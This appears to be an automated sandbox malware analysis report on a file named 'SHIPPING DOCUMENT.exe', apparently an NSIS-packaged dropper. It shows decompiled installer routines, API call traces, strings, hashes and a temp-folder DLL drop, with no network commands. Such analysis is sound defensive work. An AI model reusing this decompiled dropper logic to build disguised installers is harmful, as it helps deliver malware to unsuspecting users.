                                            0x00403a60
                                            0x00403abb
                                            0x00403ac5
                                            0x00403ace
                                            0x00403ad3
                                            0x00403ae4
                                            0x00403b6b
                                            0x00403b73
                                            0x00403b7c
                                            0x00403b7c
                                            0x00403b92
                                            0x00403b98
                                            0x00403ba6
                                            0x00403c27
                                            0x00403c2f
                                            0x00403c39
                                            0x00403c3e
                                            0x00403c44
                                            0x00403cce
                                            0x00403cd3
                                            0x00403cd5
                                            0x00403cf1
                                            0x00000000
                                            0x00403cf1
                                            0x00403cd7
                                            0x00403cdd
                                            0x00403ce5
                                            0x00403ce5
                                            0x00000000
                                            0x00403cdd
                                            0x00403c52
                                            0x00403c5d
                                            0x00403c62
                                            0x00403c64
                                            0x00403c6b
                                            0x00403c6b
                                            0x00403c76
                                            0x00403c7e
                                            0x00403c80
                                            0x00403c82
                                            0x00403c8b
                                            0x00403c8e
                                            0x00403c94
                                            0x00403c94
                                            0x00403c9a
                                            0x00403cb3
                                            0x00403cc4
                                            0x00000000
                                            0x00403cc9
                                            0x00403c31
                                            0x00403c33
                                            0x00000000
                                            0x00403ba8
                                            0x00403ba8
                                            0x00403bb4
                                            0x00403bbe
                                            0x00403bc4
                                            0x00403bc9
                                            0x00403bd8
                                            0x00403cf6
                                            0x00403cf6
                                            0x00000000
                                            0x00403cf6
                                            0x00403be7
                                            0x00403c22
                                            0x00000000
                                            0x00403c22
                                            0x00403aea
                                            0x00403aea
                                            0x00403aed
                                            0x00403aef
                                            0x00000000
                                            0x00000000
                                            0x00403af9
                                            0x00403b09
                                            0x00403b0e
                                            0x00403b15
                                            0x00000000
                                            0x00000000
                                            0x00403b19
                                            0x00403b1b
                                            0x00403b28
                                            0x00403b28
                                            0x00403b30
                                            0x00403b36
                                            0x00403b5e
                                            0x00403b66
                                            0x00000000
                                            0x00403b48
                                            0x00403b49
                                            0x00403b52
                                            0x00403b58
                                            0x00403b59
                                            0x00000000
                                            0x00403b59
                                            0x00403b54
                                            0x00403b56
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00403b56
                                            0x00403b36

                                            APIs
                                              • Part of subcall function 00406631: GetModuleHandleA.KERNEL32(?,?,?,004034D4,0000000B), ref: 00406643
                                              • Part of subcall function 00406631: GetProcAddress.KERNEL32(00000000,?), ref: 0040665E
                                            • GetUserDefaultUILanguage.KERNELBASE(00000002,73BCFA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SHIPPING DOCUMENT.exe" ,00000000), ref: 00403A55
                                              • Part of subcall function 00406186: wsprintfA.USER32 ref: 00406193
                                            • lstrcatA.KERNEL32(1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000,00000002,73BCFA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SHIPPING DOCUMENT.exe" ,00000000), ref: 00403AB6
                                            • lstrlenA.KERNEL32(uvlcopdlxoed,?,?,?,uvlcopdlxoed,00000000,C:\Users\user\AppData\Local\Temp,1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000,00000002,73BCFA90), ref: 00403B2B
                                            • lstrcmpiA.KERNEL32(?,.exe,uvlcopdlxoed,?,?,?,uvlcopdlxoed,00000000,C:\Users\user\AppData\Local\Temp,1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000), ref: 00403B3E
                                            • GetFileAttributesA.KERNEL32(uvlcopdlxoed), ref: 00403B49
                                            • LoadImageA.USER32 ref: 00403B92
                                            • RegisterClassA.USER32 ref: 00403BCF
                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403BE7
                                            • CreateWindowExA.USER32 ref: 00403C1C
                                            • ShowWindow.USER32(00000005,00000000), ref: 00403C52
                                            • GetClassInfoA.USER32 ref: 00403C7E
                                            • GetClassInfoA.USER32 ref: 00403C8B
                                            • RegisterClassA.USER32 ref: 00403C94
                                            • DialogBoxParamA.USER32 ref: 00403CB3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: "C:\Users\user\Desktop\SHIPPING DOCUMENT.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$PB$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$uvlcopdlxoed$>B
                                            • API String ID: 606308-1474706934
                                            • Opcode ID: 8cd03706bc3b4e3cd0d6d37f96b9a73a5a3b7a5ac7853bf60a8ad06bd9737550
                                            • Instruction ID: 0b0e7d8dfe967f47b98d7fa3c12120eb495d8fa8be153c65172cdb3e572a9271
                                            • Opcode Fuzzy Hash: 8cd03706bc3b4e3cd0d6d37f96b9a73a5a3b7a5ac7853bf60a8ad06bd9737550
                                            • Instruction Fuzzy Hash: A061C4702046046EE620AF65AD46F3B3A7CEB8574AF40443FF951B62D3CB7D99068A2D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00402EF1, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 204memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 96%
                                            			E00402EF1(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				signed int _t54;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t77;
				signed int _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t92;
				long _t94;
				signed int _t102;
				signed int _t104;
				void* _t106;
				signed int _t107;
				signed int _t110;
				intOrPtr* _t111;

				_t94 = 0;
				_v8 = 0;
				_v12 = 0;
				 *0x424750 = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\jones\\Desktop\\SHIPPING DOCUMENT.exe", 0x400);
				_t106 = E00405DC1("C:\\Users\\jones\\Desktop\\SHIPPING DOCUMENT.exe", 0x80000000, 3);
				 *0x40a018 = _t106;
				if(_t106 == 0xffffffff) {
					return "Error launching installer";
				}
				E00406228("C:\\Users\\jones\\Desktop", "C:\\Users\\jones\\Desktop\\SHIPPING DOCUMENT.exe");
				E00406228(0x42c000, E00405C07("C:\\Users\\jones\\Desktop"));
				_t54 = GetFileSize(_t106, 0);
				__eflags = _t54;
				 *0x41f908 = _t54;
				_t110 = _t54;
				if(_t54 <= 0) {
					L24:
					E00402E52(1);
					__eflags =  *0x424758 - _t94;
					if( *0x424758 == _t94) {
						goto L32;
					}
					__eflags = _v12 - _t94;
					if(_v12 == _t94) {
						L28:
						_t111 = GlobalAlloc(0x40, _v20);
						E00406756(0x40b870);
						E00405DF0( &_v300, "C:\\Users\\jones\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
						__eflags = _t62 - 0xffffffff;
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E00403419( *0x424758 + 0x1c);
							 *0x41f90c = _t65;
							 *0x41f900 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00403192(_v16, 0xffffffff, _t94, _t111, _v20); // executed
							__eflags = _t68 - _v20;
							if(_t68 == _v20) {
								__eflags = _v40 & 0x00000001;
								 *0x424754 = _t111;
								 *0x42475c =  *_t111;
								if((_v40 & 0x00000001) != 0) {
									 *0x424760 =  *0x424760 + 1;
									__eflags =  *0x424760;
								}
								_t45 = _t111 + 0x44; // 0x44
								_t70 = _t45;
								_t102 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t111;
									_t102 = _t102 - 1;
									__eflags = _t102;
								} while (_t102 != 0);
								_t71 =  *0x41f8fc; // 0x3129d
								 *((intOrPtr*)(_t111 + 0x3c)) = _t71;
								E00405D7C(0x424780, _t111 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L32;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E00403419( *0x41f8f8);
					_t77 = E00403403( &_a4, 4);
					__eflags = _t77;
					if(_t77 == 0) {
						goto L32;
					}
					__eflags = _v8 - _a4;
					if(_v8 != _a4) {
						goto L32;
					}
					goto L28;
				} else {
					do {
						_t107 = _t110;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x424758) & 0x00007e00) + 0x200;
						__eflags = _t110 - _t82;
						if(_t110 >= _t82) {
							_t107 = _t82;
						}
						_t83 = E00403403(0x4178f8, _t107);
						__eflags = _t83;
						if(_t83 == 0) {
							E00402E52(1);
							L32:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x424758;
						if( *0x424758 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402E52(0);
							}
							goto L20;
						}
						E00405D7C( &_v40, 0x4178f8, 0x1c);
						_t89 = _v40;
						__eflags = _t89 & 0xfffffff0;
						if((_t89 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v36 - 0xdeadbeef;
						if(_v36 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v24 - 0x74736e49;
						if(_v24 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v28 - 0x74666f73;
						if(_v28 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v32 - 0x6c6c754e;
						if(_v32 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t89;
						_t104 =  *0x41f8f8; // 0x0
						 *0x424800 =  *0x424800 | _a4 & 0x00000002;
						_t92 = _v16;
						__eflags = _t92 - _t110;
						 *0x424758 = _t104;
						if(_t92 > _t110) {
							goto L32;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v12 = _v12 + 1;
							_t110 = _t92 - 4;
							__eflags = _t107 - _t110;
							if(_t107 > _t110) {
								_t107 = _t110;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t110 -  *0x41f908; // 0xd9f
						if(__eflags < 0) {
							_v8 = E004066E8(_v8, 0x4178f8, _t107);
						}
						 *0x41f8f8 =  *0x41f8f8 + _t107;
						_t110 = _t110 - _t107;
						__eflags = _t110;
					} while (_t110 != 0);
					_t94 = 0;
					__eflags = 0;
					goto L24;
				}
			}































                                            0x00402efc
                                            0x00402eff
                                            0x00402f02
                                            0x00402f1c
                                            0x00402f21
                                            0x00402f34
                                            0x00402f39
                                            0x00402f3f
                                            0x00000000
                                            0x00402f41
                                            0x00402f52
                                            0x00402f63
                                            0x00402f6a
                                            0x00402f70
                                            0x00402f72
                                            0x00402f77
                                            0x00402f79
                                            0x00403064
                                            0x00403066
                                            0x0040306b
                                            0x00403072
                                            0x00000000
                                            0x00000000
                                            0x00403078
                                            0x0040307b
                                            0x004030a7
                                            0x004030b7
                                            0x004030b9
                                            0x004030ca
                                            0x004030e5
                                            0x004030eb
                                            0x004030ee
                                            0x004030f3
                                            0x00403112
                                            0x00403122
                                            0x00403134
                                            0x00403139
                                            0x0040313e
                                            0x00403141
                                            0x0040314a
                                            0x0040314e
                                            0x00403156
                                            0x0040315b
                                            0x0040315d
                                            0x0040315d
                                            0x0040315d
                                            0x00403165
                                            0x00403165
                                            0x00403168
                                            0x00403169
                                            0x00403169
                                            0x0040316c
                                            0x0040316e
                                            0x0040316e
                                            0x0040316e
                                            0x00403171
                                            0x00403178
                                            0x00403184
                                            0x00403189
                                            0x00000000
                                            0x00403189
                                            0x00000000
                                            0x00403141
                                            0x00000000
                                            0x004030f5
                                            0x00403083
                                            0x0040308e
                                            0x00403093
                                            0x00403095
                                            0x00000000
                                            0x00000000
                                            0x0040309e
                                            0x004030a1
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00402f7f
                                            0x00402f84
                                            0x00402f89
                                            0x00402f8d
                                            0x00402f94
                                            0x00402f99
                                            0x00402f9b
                                            0x00402f9d
                                            0x00402f9d
                                            0x00402fa1
                                            0x00402fa6
                                            0x00402fa8
                                            0x00403101
                                            0x00403143
                                            0x00000000
                                            0x00403143
                                            0x00402fae
                                            0x00402fb5
                                            0x00403031
                                            0x00403035
                                            0x00403039
                                            0x0040303e
                                            0x00000000
                                            0x00403035
                                            0x00402fbe
                                            0x00402fc3
                                            0x00402fc6
                                            0x00402fcb
                                            0x00000000
                                            0x00000000
                                            0x00402fcd
                                            0x00402fd4
                                            0x00000000
                                            0x00000000
                                            0x00402fd6
                                            0x00402fdd
                                            0x00000000
                                            0x00000000
                                            0x00402fdf
                                            0x00402fe6
                                            0x00000000
                                            0x00000000
                                            0x00402fe8
                                            0x00402fef
                                            0x00000000
                                            0x00000000
                                            0x00402ff1
                                            0x00402ff7
                                            0x00403000
                                            0x00403006
                                            0x00403009
                                            0x0040300b
                                            0x00403011
                                            0x00000000
                                            0x00000000
                                            0x00403017
                                            0x0040301b
                                            0x00403023
                                            0x00403023
                                            0x00403026
                                            0x00403029
                                            0x0040302b
                                            0x0040302d
                                            0x0040302d
                                            0x00000000
                                            0x0040302b
                                            0x0040301d
                                            0x00403021
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040303f
                                            0x0040303f
                                            0x00403045
                                            0x00403051
                                            0x00403051
                                            0x00403054
                                            0x0040305a
                                            0x0040305a
                                            0x0040305a
                                            0x00403062
                                            0x00403062
                                            0x00000000
                                            0x00403062

                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00402F05
                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\SHIPPING DOCUMENT.exe,00000400), ref: 00402F21
                                              • Part of subcall function 00405DC1: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\Desktop\SHIPPING DOCUMENT.exe,80000000,00000003), ref: 00405DC5
                                              • Part of subcall function 00405DC1: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405DE7
                                            • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SHIPPING DOCUMENT.exe,C:\Users\user\Desktop\SHIPPING DOCUMENT.exe,80000000,00000003), ref: 00402F6A
                                            • GlobalAlloc.KERNEL32(00000040,0040A130), ref: 004030AC
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00402EFB, 004030C4
                                            • C:\Users\user\Desktop\SHIPPING DOCUMENT.exe, xrefs: 00402F0B, 00402F1A, 00402F2E, 00402F4B
                                            • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004030F5
                                            • Null, xrefs: 00402FE8
                                            • "C:\Users\user\Desktop\SHIPPING DOCUMENT.exe" , xrefs: 00402EF1
                                            • soft, xrefs: 00402FDF
                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00403143
                                            • C:\Users\user\Desktop, xrefs: 00402F4C, 00402F51, 00402F57
                                            • Error launching installer, xrefs: 00402F41
                                            • Inst, xrefs: 00402FD6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                            • String ID: "C:\Users\user\Desktop\SHIPPING DOCUMENT.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SHIPPING DOCUMENT.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                            • API String ID: 2803837635-573779341
                                            • Opcode ID: ca76f8d495ce3895f444a46e92879b513e81ddc2aff1e21a5d111d80dade61e3
                                            • Instruction ID: 41f98d992e8437d8d417f3691d947d8f632b5d0a71237712da2b0bb715ca9b84
                                            • Opcode Fuzzy Hash: ca76f8d495ce3895f444a46e92879b513e81ddc2aff1e21a5d111d80dade61e3
                                            • Instruction Fuzzy Hash: 1B71E131A00259ABDB20AF64DD85B9E3BACEB44355F20803BF911BA2D1C77C9E418B5C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00401759, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147stringtimeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 77%
                                            			E00401759(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				CHAR* _t83;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402BCE(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E00405C2D(_t82);
				_push(_t82);
				_t83 = "uvlcopdlxoed";
				if(_t33 == 0) {
					lstrcatA(E00405BC0(E00406228(_t83, "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
				} else {
					E00406228();
				}
				E00406503(_t83);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E0040659C(_t83);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405D9C(_t83);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405DC1(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0xc) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E0040534F(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x4247e8;
						goto L32;
					} else {
						E00406228(0x40ac20, 0x425000);
						E00406228(0x425000, _t83);
						E004062BB(_t75, 0x40ac20, _t83, "C:\Users\jones\AppData\Local\Temp\nszA951.tmp\2x6gdfzk.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E00406228(0x425000, 0x40ac20);
						_t62 = E00405944("C:\Users\jones\AppData\Local\Temp\nszA951.tmp\2x6gdfzk.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x4247e8 =  &( *0x4247e8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(_t83);
								_push(0xfffffffa);
								E0040534F();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E0040534F(0xffffffea,  *(_t85 - 8));
				 *0x424814 =  *0x424814 + 1;
				_t43 = E00403192(_t77,  *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 0xc), _t75, _t75); // executed
				 *0x424814 =  *0x424814 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0xc)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E004062BB(_t75, _t80, _t83, _t83, 0xffffffee);
					} else {
						E004062BB(_t75, _t80, _t83, _t83, 0xffffffe9);
						lstrcatA(_t83,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(_t83);
					E00405944();
					goto L29;
				}
				goto L33;
			}

















                                            0x00401759
                                            0x00401760
                                            0x00401769
                                            0x0040176c
                                            0x0040176f
                                            0x00401774
                                            0x00401775
                                            0x0040177c
                                            0x00401798
                                            0x0040177e
                                            0x0040177f
                                            0x0040177f
                                            0x0040179e
                                            0x004017a8
                                            0x004017a8
                                            0x004017ac
                                            0x004017af
                                            0x004017b4
                                            0x004017b6
                                            0x004017b8
                                            0x004017bd
                                            0x004017bd
                                            0x004017c8
                                            0x004017c8
                                            0x004017d9
                                            0x004017db
                                            0x004017db
                                            0x004017dc
                                            0x004017dc
                                            0x004017df
                                            0x004017e2
                                            0x004017e5
                                            0x004017e5
                                            0x004017ec
                                            0x004017fb
                                            0x00401800
                                            0x00401803
                                            0x00401806
                                            0x00000000
                                            0x00000000
                                            0x00401808
                                            0x0040180b
                                            0x00401865
                                            0x0040186a
                                            0x004015b0
                                            0x004027bf
                                            0x004027bf
                                            0x00402a5a
                                            0x00402a5d
                                            0x00402a5d
                                            0x00000000
                                            0x0040180d
                                            0x00401813
                                            0x0040181e
                                            0x0040182b
                                            0x00401836
                                            0x0040184c
                                            0x0040184c
                                            0x0040184f
                                            0x00000000
                                            0x00401855
                                            0x00401855
                                            0x00401856
                                            0x00401873
                                            0x00402a63
                                            0x00402a63
                                            0x00402a63
                                            0x00401858
                                            0x00401858
                                            0x00401859
                                            0x00401492
                                            0x00402387
                                            0x00402387
                                            0x00402387
                                            0x00401856
                                            0x0040184f
                                            0x00402a65
                                            0x00402a69
                                            0x00402a69
                                            0x00401883
                                            0x00401888
                                            0x00401896
                                            0x0040189b
                                            0x004018a1
                                            0x004018a5
                                            0x004018a7
                                            0x004018af
                                            0x004018bb
                                            0x004018a9
                                            0x004018a9
                                            0x004018ad
                                            0x00000000
                                            0x00000000
                                            0x004018ad
                                            0x004018c4
                                            0x004018ca
                                            0x004018cc
                                            0x00000000
                                            0x004018d2
                                            0x004018d2
                                            0x004018d5
                                            0x004018ed
                                            0x004018d7
                                            0x004018da
                                            0x004018e3
                                            0x004018e3
                                            0x004018f2
                                            0x004018f7
                                            0x00402382
                                            0x00000000
                                            0x00402382
                                            0x00000000

                                            APIs
                                            • lstrcatA.KERNEL32(00000000,00000000,uvlcopdlxoed,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401798
                                            • CompareFileTime.KERNEL32(-00000014,?,uvlcopdlxoed,uvlcopdlxoed,00000000,00000000,uvlcopdlxoed,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017C2
                                              • Part of subcall function 00406228: lstrcpynA.KERNEL32(?,?,00000400,00403533,00423F40,NSIS Error,?,00000007,00000009,0000000B), ref: 00406235
                                              • Part of subcall function 0040534F: lstrlenA.KERNEL32(00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 00405388
                                              • Part of subcall function 0040534F: lstrlenA.KERNEL32(00402EC9,00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 00405398
                                              • Part of subcall function 0040534F: lstrcatA.KERNEL32(00420530,00402EC9,00402EC9,00420530,00000000,00000000,00000000), ref: 004053AB
                                              • Part of subcall function 0040534F: SetWindowTextA.USER32(00420530,00420530), ref: 004053BD
                                              • Part of subcall function 0040534F: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004053E3
                                              • Part of subcall function 0040534F: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004053FD
                                              • Part of subcall function 0040534F: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040540B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                            • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nszA951.tmp\2x6gdfzk.dll$uvlcopdlxoed
                                            • API String ID: 1941528284-697362409
                                            • Opcode ID: ebc504ea436e693e663a4b144fd74c24bb863413e05106ae1afc4e96b16114fd
                                            • Instruction ID: 94ce822b9f6a6483fb8de35dc0b51f709499be211a85e0d844596cfba341e8bc
                                            • Opcode Fuzzy Hash: ebc504ea436e693e663a4b144fd74c24bb863413e05106ae1afc4e96b16114fd
                                            • Instruction Fuzzy Hash: 0541B931900515BACF107BB5DC45EAF7AB8DF05369B60863FF422B11E1CA7C8A528A6D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 022B11AF, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 332memoryfileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 022B14AB
                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 022B1507
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661312391.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                            Similarity
                                            • API ID: AllocCreateFileVirtual
                                            • String ID: ae5d24e5dbf54603bf79f22c17f4cb8b
                                            • API String ID: 1475775534-3306690648
                                            • Opcode ID: a28b12bcde924eaafe6d43de3a163b5bc25c9ba42ea70e5fa3e3089a2832cac7
                                            • Instruction ID: e98ea94a92b50d224a62eb05301158468d2374f0beda85ede8760cf0a1461fe7
                                            • Opcode Fuzzy Hash: a28b12bcde924eaafe6d43de3a163b5bc25c9ba42ea70e5fa3e3089a2832cac7
                                            • Instruction Fuzzy Hash: 31D15B30D54388EDEB22DBE4DC15BEDBBB6AF04710F10409AE648FA291D7B50AA4DB15
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 022B06DD, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 022B07DF
                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 022B09AC
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661312391.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                            Similarity
                                            • API ID: CreateFileFreeVirtual
                                            • String ID:
                                            • API String ID: 204039940-0
                                            • Opcode ID: 599f8110e16db9737b2466583893bfe11ddc87256f2f29cb349cda40ce9798ba
                                            • Instruction ID: 296d9bb0ac0c23d4d9e51166196952398ed2009808f2a5692a79fb1239500864
                                            • Opcode Fuzzy Hash: 599f8110e16db9737b2466583893bfe11ddc87256f2f29cb349cda40ce9798ba
